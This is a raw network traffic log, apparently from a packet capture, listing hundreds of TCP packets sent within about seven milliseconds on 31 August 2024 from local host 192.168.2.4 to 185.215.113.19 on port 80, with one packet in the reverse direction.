Aug 31, 2024 22:41:57.757960081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757973909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757997036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758013010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758035898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758059978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758069992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758085966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758109093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758130074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758145094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758169889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758182049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758204937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758223057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758243084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758259058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758279085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758302927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758313894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758341074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758362055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758375883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758397102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758416891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758436918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758452892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758474112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758488894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758516073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758526087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758548021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758570910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758589029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758611917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758631945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758651018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758663893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758686066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758708000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758728981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758748055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758760929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758783102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758804083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758817911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758841991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758863926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758877993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758900881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758917093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758941889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758943081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.758960009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.758999109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759026051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759041071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759062052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759074926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759098053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759114027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759140015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759155989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759176016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759196997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759217024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759239912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759270906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759289980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759309053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759330988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759352922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759372950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759406090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759421110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759447098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759473085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759499073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759511948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759537935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759557009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759574890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759597063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759651899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759661913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759685993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759702921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759723902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759743929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759766102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759790897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759804010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759829044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759844065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759867907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759884119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759905100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759926081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759943008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759965897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.759980917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760006905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760025024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760046959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760071039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760098934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760114908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760134935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760157108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760176897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760195017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760209084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760231972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760251999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760273933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760299921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760315895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760341883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760364056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760385990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760406017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760426998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760437965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760464907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760492086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760500908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760523081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760540962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760556936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760577917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760598898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760616064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760638952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760653019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760678053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760699987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760721922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760730982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760752916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760767937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760788918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760808945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760828972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760843039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760865927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760885000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760905027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760926962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760942936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760966063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.760982990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761006117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761015892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761039019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761055946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761076927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761096954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761113882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761135101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761148930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761176109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761192083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761214972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761229992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761254072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761271954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761287928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761307955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761328936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761344910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761364937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761378050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761399031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761414051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761440992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761461973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761476040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761501074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761517048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761538982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761554003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761579990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761604071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761626959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761646032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761666059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761686087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761704922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761717081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761744022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761765957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761782885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761796951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761818886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761838913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761858940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761883020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761902094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761921883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761938095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761960983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761976957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.761996984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762017965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762038946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762058973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762077093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762099028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762115002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762139082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762156010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762176991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762197018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762217999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762238026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762253046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762270927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762290955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762312889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762337923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762346983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762367964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762388945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762408018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762429953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762444973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762468100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762489080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762506962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762521982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762543917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762556076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762576103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762599945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762622118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762641907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762655973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762679100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762700081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762718916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762742043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762759924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762778044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762794018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762814999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762835979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762851000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762887955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762908936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762928963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762944937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762967110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.762989044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763010979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763025999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763048887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763070107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763082981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763104916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763123989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763144016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763158083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763183117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763202906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763216972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763238907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763262033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763282061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763303041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763319016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763344049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763360023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763379097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763396978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763411045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763428926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763452053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763470888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763492107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763509989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763533115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763550997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763572931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763588905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763609886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763622046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763643980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763659954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763681889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763731003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763775110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763775110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763787985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763787985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763788939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763844013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763844013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763855934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763902903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763926983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763926983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763937950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763937950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763958931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763969898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.763988972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764010906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764029026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764060020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764084101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764187098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764219999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764250040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764276028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764298916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764329910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764355898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764381886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764405966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764429092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764452934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764477968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764511108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764539003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764560938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764591932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764616013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764642954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764668941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764689922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764712095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764738083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.764761925 CEST	49732	80	192.168.2.4	185.215.113.19
